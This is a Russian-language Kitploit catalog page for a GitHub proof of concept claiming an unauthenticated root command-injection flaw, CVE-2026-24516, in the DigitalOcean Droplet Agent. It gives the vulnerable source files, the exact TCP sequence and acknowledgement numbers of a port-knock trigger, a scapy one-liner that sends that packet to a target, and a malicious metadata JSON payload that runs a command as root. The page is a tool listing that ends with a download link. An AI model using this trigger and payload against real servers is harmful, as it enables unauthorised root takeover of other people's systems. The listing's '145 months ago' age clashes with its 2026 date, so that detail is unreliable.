Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24516-DigitalOcean-RCE — Критическая Pre-Auth Root RCE (CVSS 10.0) в DigitalOcean Droplet Agent до версии v1.3.2 через внедрение команд. | Kitploit
Инструменты/GitHubGitHub/poxsky/cve-2026-24516-digitalocean-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubpoxsky/cve-2026-24516-digitalocean-rce

CVE-2026-24516-DigitalOcean-RCE

Критическая Pre-Auth Root RCE (CVSS 10.0) в DigitalOcean Droplet Agent до версии v1.3.2 через внедрение команд.

Репозиторий
145 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-24516-DigitalOcean-RCE

Критическая Pre-Auth Root RCE (CVSS 10.0) в DigitalOcean Droplet Agent до версии v1.3.2 через внедрение команд.

CVE-2026-24516: Pre-Auth Root RCE в DigitalOcean Droplet Agent

Обзор

Критическая уязвимость внедрения команд была обнаружена в DigitalOcean Droplet Agent (все версии до 1.3.2 включительно). Эта ошибка позволяет злоумышленнику добиться удалённого выполнения кода (RCE) с привилегиями root без какой-либо аутентификации.

Обнаружил: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research

Технические детали

Уязвимость существует в компоненте устранения неполадок:

  • internal/troubleshooting/actioner/actioner.go
  • internal/troubleshooting/command/exec.go

Агент обрабатывает метаданные из локального сервиса (169.254.169.254) и выполняет команды из массива без надлежащей санитизации.

TroubleshootingAgent.Requesting

Триггер (Port Knocking)

Агент активируется определённым TCP-пакетом на порт 22:

  • SeqNum: 68796879
  • AckNum: 848489

Proof of Concept (PoC)

  1. Запуск получения данных: python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"

  2. Вредоносная полезная нагрузка метаданных:

    root@kitploit:~
    {
      "troubleshooting_agent": {
        "requesting": ["command:id > /tmp/pwned"]
      }
    }
    

Воздействие Оценка CVSS: 10.0 (Критическая)

Требуемые привилегии: Нет

Результат: Полная компрометация системы (доступ root)

photo_1_2026-03-22_13-46-01 photo_12_2026-03-22_13-46-01 photo_3_2026-03-22_13-46-01 photo_4_2026-03-22_13-46-01 photo_5_2026-03-22_13-46-01 photo_6_2026-03-22_13-46-01

Скачать инструмент